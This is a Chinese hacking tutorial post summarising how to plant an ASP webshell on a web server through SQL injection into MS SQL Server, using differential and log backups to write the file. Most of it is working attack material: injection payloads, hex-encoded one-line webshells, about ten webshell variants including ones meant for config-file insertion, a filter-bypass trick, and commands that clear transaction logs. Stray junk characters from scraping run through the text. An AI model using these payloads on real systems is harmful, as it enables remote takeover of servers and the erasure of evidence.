MSsql差异备份总结

admin

差异备份的流程大概这样：
* _) L; v  t* A" Y( E8 ^- D' s1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
0 B2 U+ v: K' j: D3 j* q
  q* k2 X" a  U$ ~4 v5 {, f& p2.创建表并插曲入数据
; R  T, p. D" e! g6 \create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

8 L! m9 W& @% _" T3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

: V, `) y5 x) A9 u$ n上面
; C3 S( g0 J7 _$ o: ^0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>
* ^/ L) |  m5 Y7 j5 S6 ?8 q9 C
3 C; [. g& r" |$ o. }如下是网上常见的差异备份代码，思路一样！
===================================================
0 k% t* ^5 q% p! j) e% h. B利用差异备份提高提高backupwebshell的成功率,减少文件大小
. ~, }$ r, Y4 N. i7 m' d# V# Y+ }* o步骤:
9 A/ Y3 S9 M! k4 E+ m
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

2 n1 h* S0 e1 [: Mcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
. x. r" s4 G# s+ |0 I

+ M  K) u" {2 _% J' P- Iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

, R% g2 W; b+ udrop table [xiaolu]  -- 删除此表。
" z! o* m9 ^' R/ c! S. }5 E
2 [8 L! G3 l0 _; ~5 \5 S0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
- m7 t& i% C5 s- J- v/ S8 D3 U: l0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
0 E0 k! U1 J3 _" i
0 ~7 |5 p: Y# k( ?3 h2 i声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================

我发现上面代码，有时会无效，而直接用

. ]9 n# g6 F4 h. ?9 i( I" xbackup database 库名 to disk = 'c:\ddd.bak'
- M; [) ]" l0 H4 Y2 m
4 {) ?* N& M1 X+ ~create table [dbo].[dtest] ([cmd] [image]);

insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
. N+ i, n9 }% y0 n6 _
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

6 e$ O. i+ {, L- u6 {* U网上还有log增量备份的，我也把他记录一下
- Q- T! n! e5 {* d; L6 W( u=====================================================
# ^; i+ [) L" k另一种log增量备份技术:

5 X: C) ^, R) P+ n: C+ Y, ^/ D. c';alter database null set RECOVERY FULL--
8 i6 R: `# V5 A8 G: g# T2 B" Q
2 K) s- p: a3 C( Z. t& q';create table cmd (a image)--
8 |2 p6 @8 X( U) W# u, g
';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
* K  }, r* j/ z$ @
';backup log null to disk = '备份路径'--
& h$ t$ D. ^- a; s! Q; m
0 R' U4 H) W& `2 j+ E';drop table cmd--
9 i  e3 L9 B# \, _& j# n5 p6 p
';alter database XXX set RECOVERY SIMPLE--
( D8 w2 k+ ^) o0 S' ]7 ^- a6 t4 B% S/ e. A
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：
/ g8 f1 w; A- L. X
a)<%%25Execute(request("a"))%%25>
* @- X/ @. R0 o6 Eb)<%Execute(request("a"))%>
/ h  c  B/ N$ V( u# vc)%><%execute request("a")%><%
+ ^" b3 X/ b: M% J5 U7 c3 M) gd)<script language=VBScript runat=server>execute request("a")</script>
e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
5 @. r, X; z5 Jg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
! o, i0 q1 P6 ~. J1 V# a2 }- Nh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
# D. j3 T/ E( I" k3 NI)<%eval request(0)%>
0 ]* c& w8 W8 r8 h6 VJ)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

# V% U0 J2 k* j# y. G! o4 o=============================================
" }& l" X  k% c- Z8 }" A
; M; x) [  {" D当遇到差备过滤了/时用这个语句代替
  c& x- c; T5 @  z
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
, t; E5 E* @2 Y8 V9 R* |
) w* ~- k. m0 D2 b" X把要执行的语句转16进制然后用exec执行
1 O6 a3 r' C- d; t6 i- D9 @* t- s

* w$ l, i8 [/ W& ^减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
( R4 P1 H2 p9 x6 G7 P, c1 Mid=1;backup database model to disk='你的路径‘ with differential,format;--
8 x$ y$ W- J4 f! k) m: w
$ Y6 }7 C, J1 F- L/ x  |" ^3 N

9 u1 O6 e2 x3 E; ^( Z* RSQL语句清理日志
0 m0 `$ ]6 H  z  O注：test为数据库名

( Y4 j. f2 T/ S1 o+ F6 C--清空日志
7 {8 r1 n/ K* U, i# S, yDUMP TRANSACTION test WITH NO_LOG

; L+ _8 F: I, q6 r, L# q: k--截断事务日志
7 [; u. u/ a1 `2 I: KBACKUP LOG test WITH NO_LOG

--收缩数据库
DBCC SHRINKDATABASE(test)

--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)

' V1 U% r6 S; d6 ?8 _! s/ h--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'